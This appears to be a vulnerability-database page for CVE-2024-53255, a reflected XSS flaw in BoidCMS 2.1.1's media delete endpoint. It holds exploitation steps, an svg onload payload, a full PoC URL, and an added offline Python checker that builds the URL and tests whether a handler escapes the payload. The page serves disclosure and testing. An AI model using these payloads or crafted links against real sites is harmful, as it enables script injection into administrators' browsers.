Related vulnerability
Title:
BoidCMS security vulnerability
(CVE-2024-53255)
Description: BoidCMS is a free, open-source flat-file CMS from the BoidCMS project for building simple websites and blogs; it is written in PHP and uses JSON as its database. BoidCMS 2.1.1 and earlier contain a reflected cross-site scripting (XSS) vulnerability in the file parameter of the /admin?page=media endpoint, which allows an attacker to inject arbitrary JavaScript code.
Description
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
Introduction
# CVE-2024-53255
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
# Description:
A reflected XSS vulnerability exists in the file parameter of the /admin?page=media endpoint (delete action), allowing an attacker to inject arbitrary JavaScript code that executes in the browser of the logged-in admin user.
# Steps to exploit:
1- Log in to the CMS and navigate to the media page (/admin?page=media).
2- Select any file to delete and intercept the request with a proxy tool.
3- In the intercepted request, replace the value of the file parameter with:
```
<svg+onload%3dalert(document.domain)>
```
4- Forward the modified request; the injected script executes when the response is rendered.
Proof of concept (PoC):
```
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4
```
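The four steps above boil down to one request and one observation: put a tag in the file parameter and see whether it comes back as live markup or as escaped text. The following Python script, an added example that is not code from the BoidCMS project or from the original PoC author, reproduces that logic offline: it builds the PoC URL with the payload properly URL-encoded, and it classifies a response as vulnerable or safe by checking whether the payload is reflected verbatim. The two render functions are constructed stand-ins for the vulnerable and a hardened handler (escaping the way PHP's htmlspecialchars() would; whether the linked fix commit does exactly that is not stated on this page), and the responses are constructed, not captured from a real install.

```python
"""Offline helper for CVE-2024-53255 (reflected XSS in BoidCMS media delete).

Added example, not BoidCMS project code. Assumptions (not from the page):
- the vulnerable handler echoes the `file` parameter into HTML unescaped;
- a hardened handler escapes it like PHP htmlspecialchars() (html.escape
  with quote=True produces the same entities for < > & " ');
- the response bodies below are constructed, not captured.
"""
from html import escape
from urllib.parse import urlencode

# Decoded form of the payload from the PoC (the page shows it URL-encoded).
PAYLOAD = "<svg onload=alert(document.domain)>"


def build_poc_url(base, token, payload=PAYLOAD):
    """Step 3 of the procedure: the delete request with the payload as `file`.

    urlencode() uses quote_plus, so ' ' becomes '+' and '=' becomes %3D,
    matching the shape of the PoC URL; '<', '>' and '()' are also encoded,
    which the server decodes to the same string.
    """
    query = urlencode(
        {"page": "media", "action": "delete", "file": payload, "token": token}
    )
    return f"{base.rstrip('/')}/admin?{query}"


def vulnerable_render(file_name):
    """Constructed stand-in for the vulnerable behaviour: raw reflection."""
    return f'<div class="alert">Unable to delete file "{file_name}"</div>'


def hardened_render(file_name):
    """Same message with the filename HTML-escaped before it reaches the page."""
    safe_name = escape(file_name, quote=True)
    return f'<div class="alert">Unable to delete file "{safe_name}"</div>'


def is_reflected_unescaped(body, payload=PAYLOAD):
    """True when the payload appears verbatim in the body (a live element).

    An escaped reflection (&lt;svg ...&gt;) does not match, so it counts as
    safe for this particular payload.
    """
    return payload in body


def classify(render, payload=PAYLOAD):
    """Run one constructed handler and label the outcome."""
    body = render(payload)
    return "vulnerable" if is_reflected_unescaped(body, payload) else "safe"


if __name__ == "__main__":
    print(build_poc_url("http://localhost/boidcms", "0000"))  # token is a placeholder
    for name, handler in (("raw echo", vulnerable_render), ("escaped", hardened_render)):
        print(f"{name}: {classify(handler)}")
```

Two practical caveats when using this against a real target. First, the PoC URL carries the CSRF token of the logged-in session; the page does not say whether the file value is reflected before or after that token is validated, and that decides whether a plain crafted link to the victim suffices or whether a valid token must also be obtained. Second, the substring check above is tuned to the svg payload; a handler that strips or rewrites only some characters could still be exploitable with a different payload, so a negative result is evidence, not proof.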
For details:
https://nvd.nist.gov/vuln/detail/CVE-2024-53255
https://www.cve.org/CVERecord?id=CVE-2024-53255
https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7
https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r
File snapshot
[4.0K] /data/pocs/d606f211b0d25e490e53c8e3256ca268bc638f61
└── [1.0K] README.md
0 directories, 1 file
Notes
1. Access via the original source is recommended.
2. If the source is unavailable or inaccessible, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.